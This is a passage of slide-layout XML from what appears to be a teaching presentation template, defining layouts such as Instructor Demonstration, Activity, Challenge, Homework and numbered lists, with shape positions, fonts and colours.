          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0"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81" name="Google Shape;1081;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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82" name="Google Shape;1082;p6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083" name="Google Shape;1083;p6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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;p6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085" name="Google Shape;1085;p60"/>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9. Call Attention Slide">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1086"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1087" name="Google Shape;1087;p61"/>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088" name="Google Shape;1088;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544050" y="1545675"/>
            <a:ext cx="5770200" cy="2430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36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089" name="Google Shape;1089;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="139" r="149"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258175" y="1332825"/>
            <a:ext cx="1371601" cy="2002535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;p6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091" name="Google Shape;1091;p61"/>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6. Transition Slide">
  <p:cSld name="CUSTOM_17_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Google Shape;54;p7"/>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55" name="Google Shape;55;p7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237100"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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>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56" name="Google Shape;56;p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57" name="Google Shape;57;p7"/>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10. Instructor Demonstration">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1092"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p62"/>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094" name="Google Shape;1094;p62"/>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62"/>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6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097" name="Google Shape;1097;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242550" y="3895344"/>
            <a:ext cx="8907900" cy="427500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="91425" rIns="914400" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">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
        <p:nvSpPr>
          <p:cNvPr id="1098" name="Google Shape;1098;p62"/>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099" name="Google Shape;1099;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="409963" y="-228600"/>
            <a:ext cx="8535272" cy="4064423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="Google Shape;1100;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4387000"/>
            <a:ext cx="9251400" cy="482100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="9125" rIns="914400"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11. Activity">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1101"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1102" name="Google Shape;1102;p63"/>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103" name="Google Shape;1103;p63"/>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04" name="Google Shape;1104;p63"/>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105" name="Google Shape;1105;p63"/>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06" name="Google Shape;1106;p63"/>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07" name="Google Shape;1107;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899000" y="1133363"/>
            <a:ext cx="1737360" cy="1911096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108" name="Google Shape;1108;p6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109" name="Google Shape;1109;p63"/>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1110" name="Google Shape;1110;p63"/>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11" name="Google Shape;1111;p63"/>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12. Activity with Instructions ">
  <p:cSld name="CUSTOM_2_5_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1112"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8275625" y="4154800"/>
            <a:ext cx="594361" cy="653795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p6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115" name="Google Shape;1115;p6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116" name="Google Shape;1116;p6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17" name="Google Shape;1117;p6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18" name="Google Shape;1118;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1119" name="Google Shape;1119;p6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120" name="Google Shape;1120;p64"/>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21" name="Google Shape;1121;p64"/>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13. Challenge">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1123" name="Google Shape;1123;p65"/>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124" name="Google Shape;1124;p65"/>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25" name="Google Shape;1125;p65"/>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126" name="Google Shape;1126;p6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127" name="Google Shape;1127;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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28" name="Google Shape;1128;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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29" name="Google Shape;1129;p65"/>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1130" name="Google Shape;1130;p65"/>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131" name="Google Shape;1131;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="-595025"/>
            <a:ext cx="2950353" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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14. Challenge with Instructions">
  <p:cSld name="CUSTOM_2_5_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1132"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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34" name="Google Shape;1134;p6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135" name="Google Shape;1135;p6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136" name="Google Shape;1136;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>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1137" name="Google Shape;1137;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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38" name="Google Shape;1138;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>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139" name="Google Shape;1139;p6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140" name="Google Shape;1140;p66"/>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141" name="Google Shape;1141;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8213200" y="3862850"/>
            <a:ext cx="656773" cy="1144971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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15. Homework">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1142"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p67"/>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144" name="Google Shape;1144;p67"/>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45" name="Google Shape;1145;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="209"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858369" y="1097625"/>
            <a:ext cx="1737361" cy="1980591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146" name="Google Shape;1146;p67"/>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47" name="Google Shape;1147;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062160" y="3975150"/>
            <a:ext cx="548640" cy="725893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148" name="Google Shape;1148;p6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149" name="Google Shape;1149;p67"/>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50" name="Google Shape;1150;p67"/>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Due Date:</a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151;p67"/>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52" name="Google Shape;1152;p67"/>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1800">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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16. Homework with Instructions">
  <p:cSld name="CUSTOM_2_5_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1153"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>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1155" name="Google Shape;1155;p6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156" name="Google Shape;1156;p6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pic>
        <p:nvPicPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="504"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257069" y="4200875"/>
            <a:ext cx="548641" cy="624077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1158" name="Google Shape;1158;p6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59" name="Google Shape;1159;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>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160" name="Google Shape;1160;p6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161" name="Google Shape;1161;p68"/>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62" name="Google Shape;1162;p68"/>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5005">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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17. Numbered 1–4 (Green)">
  <p:cSld name="CUSTOM_2_7_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1163"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p69"/>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6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66" name="Google Shape;1166;p6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167" name="Google Shape;1167;p6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168" name="Google Shape;1168;p6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169" name="Google Shape;1169;p6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170" name="Google Shape;1170;p6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171" name="Google Shape;1171;p69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1172" name="Google Shape;1172;p69"/>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173" name="Google Shape;1173;p69"/>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4" name="Google Shape;1174;p69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1175" name="Google Shape;1175;p69"/>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176" name="Google Shape;1176;p69"/>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7" name="Google Shape;1177;p69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1178" name="Google Shape;1178;p69"/>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179" name="Google Shape;1179;p69"/>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0" name="Google Shape;1180;p69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1181" name="Google Shape;1181;p69"/>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182" name="Google Shape;1182;p69"/>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83" name="Google Shape;1183;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="13980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84" name="Google Shape;1184;p69"/>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69"/>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69"/>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69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2233538"/>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88" name="Google Shape;1188;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076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89" name="Google Shape;1189;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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18. Numbered 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1190"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p70"/>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7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93" name="Google Shape;1193;p7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194" name="Google Shape;1194;p7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195" name="Google Shape;1195;p7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196" name="Google Shape;1196;p7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197" name="Google Shape;1197;p7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198" name="Google Shape;1198;p70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1300225"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1199" name="Google Shape;1199;p70"/>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200" name="Google Shape;1200;p70"/>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1" name="Google Shape;1201;p70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2000125"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1202" name="Google Shape;1202;p70"/>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203" name="Google Shape;1203;p70"/>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4" name="Google Shape;1204;p70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2692850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1205" name="Google Shape;1205;p70"/>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206" name="Google Shape;1206;p70"/>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7" name="Google Shape;1207;p70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3390350"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1208" name="Google Shape;1208;p70"/>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209" name="Google Shape;1209;p70"/>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10" name="Google Shape;1210;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7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11" name="Google Shape;1211;p70"/>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70"/>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70"/>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70"/>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15" name="Google Shape;1215;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2695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16" name="Google Shape;1216;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="33855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217" name="Google Shape;1217;p70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="469500" y="4083075"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1218" name="Google Shape;1218;p70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="134F5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1219" name="Google Shape;1219;p70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="134F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20" name="Google Shape;1220;p70"/>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70"/>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19. Numbered 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1222"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;p71"/>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7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25" name="Google Shape;1225;p7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226" name="Google Shape;1226;p7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227" name="Google Shape;1227;p7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228" name="Google Shape;1228;p7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229" name="Google Shape;1229;p7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230" name="Google Shape;1230;p71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1231" name="Google Shape;1231;p71"/>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1232" name="Google Shape;1232;p71"/>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33" name="Google Shape;1233;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="12746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34" name="Google Shape;1234;p71"/>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35" name="Google Shape;1235;p71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1236" name="Google Shape;1236;p71"/>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1237" name="Google Shape;1237;p71"/>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38" name="Google Shape;1238;p71"/>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39" name="Google Shape;1239;p71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
